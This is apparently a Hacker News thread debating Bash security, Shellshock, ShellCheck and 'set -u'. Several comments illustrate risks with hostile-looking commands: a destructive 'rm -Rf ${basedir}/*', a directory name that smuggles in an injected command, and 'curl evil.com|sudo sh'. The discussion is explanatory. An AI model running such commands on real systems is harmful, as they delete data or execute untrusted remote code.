Hacker News new | ask | show | jobs
by hsbauauvhabzb 1363 days ago
I’ve asked before on hn and will ask again, I’m sure a bash core dev said something along the lines of ‘if you want a secure shell don’t use bash’, I’d love to see the original quote, and context so I can cite it formally.

To be clear, I think this was in reference to shell shock and not a generic statement. Bash has its place, I think everyone agrees that place isn’t cgi scripts though.
4 comments
LinuxBender 1362 days ago
if you want a secure shell don’t use bash

I do not expect a shell to be secure. In my opinion that is the job of mandatory access controls, sandboxes, chroot jails, setcap, posix permissions, etc... and of course the job of the script author.

I do however try to keep shell scripting done with some best practices to minimize mistakes and mistakenly executing the wrong resources. A good start is to use ShellCheck [1] available and a command line tool in most distro repositories. ShellCheck has corrected some of my old bad habits. In the cases where I disagree with ShellCheck findings, there are options that can be added as comments to scripts that will ignore specific checks.

Speaking of security and mistakes, one common mistake I see in scripts is to leave out "set -u" in bash scripts. I actually wish that were default and that one had to disable it when required and it is sometimes required. This would prevent many accidental incidents of data loss. e.g.

    rm -Rf ${basedir}/*  # yeah nobody should do this but it happens, sometimes with sudo.
If the variable basedir is not set, bash will interpret that as rm -Rf /* whereas with 'set -u' in place there will be an error and the script will exit. This is similar to one of the checks in Perl's taint mode.

[1] - https://www.shellcheck.net/

link
rollcat 1362 days ago
> I do not expect a shell to be secure.

You should. The example with "rm -Rf" is a problem with ergonomics/usability; what definitely would be way more scary is e.g. if the shell had an arbitrary code execution vulnerability in its path processing code.

    $ /bin/sh

    $ cd /some/path+evilmagic+'echo pwned!'  # that's just a normal directory name, allowed by POSIX

    $ /bin/vulnsh  # prints "pwned!"
link
LinuxBender 1362 days ago
Those are interesting theoretical examples of phishing or backdoors and they have probably occurred at some point. I've moved away from trying to mitigate theoretical threats and instead I prefer to focus on risk ranking by feasibility or probability based on the potential impact. I believe the onus is on me to review a script and understand it prior to execution and report malicious scripts.

If my job was to mitigate theoretical attacks then I would require everyone to run scripts in highly restricted sandboxes that log the obfuscated behavior. This is probably something that build automation systems should be doing regardless for all scripts and compiled code to detect things like backdoored NPM packages which is all the rage these days. I would also like to see multipurpose repository systems like Github and Gitlab perform these sandboxed tests, rating scripts and compiled code with behavioral risk scores.

I am mostly content with the current status of Bash security and the toggles it gives me to control behavior. There are some things I would prefer defaulted on but I understand why they do not.

link
rollcat 1361 days ago
These concerns are not theoretical. Complex software has bugs, and Bash doesn't have a perfect track record. https://en.wikipedia.org/wiki/Shellshock_(software_bug)

While my path processing scenario is hypothetical, you shouldn't need additional sandboxing to merely browse the local filesystem. You should trust tar not to overwrite files outside cwd. You should trust ls not to execute arbitrary code when listing a directory. You should trust the TCP/IP stack not to cause a kernel panic when a malformed ping shows up at your NIC. There's a huuuge difference between that and "curl evil.com|sudo sh".

link
chasil 1363 days ago
The grammar of the POSIX shell (and derivatives) is not an LR-parsed language that can be implemented with yacc.

It requires an advanced parser.

There is an effort with OCaml (and another with ADA) to create a formal and secure parser. They remark that dash is a handcrafted parser in C that cannot be formally assured.

https://archive.fosdem.org/2018/schedule/event/code_parsing_...

https://archive.fosdem.org/2019/schedule/event/ada_shell/

link
stjohnswarts 1363 days ago
cgi scripts... now that's a name I haven't heard in a long time...
link
arpa 1362 days ago
i disagree. My webserver is written in bash.
link
hsbauauvhabzb 1361 days ago
Ah yes, one self certified ‘secure’ app proves the language is secure.

I think arguing that you’ll have a hard time arguing that weakly typed, structureless, idiosyncratic language is secure.

link
arpa 1355 days ago
it is never the language, it's the implementation. But y'all software "engineers" parrot the same shite since 1989
link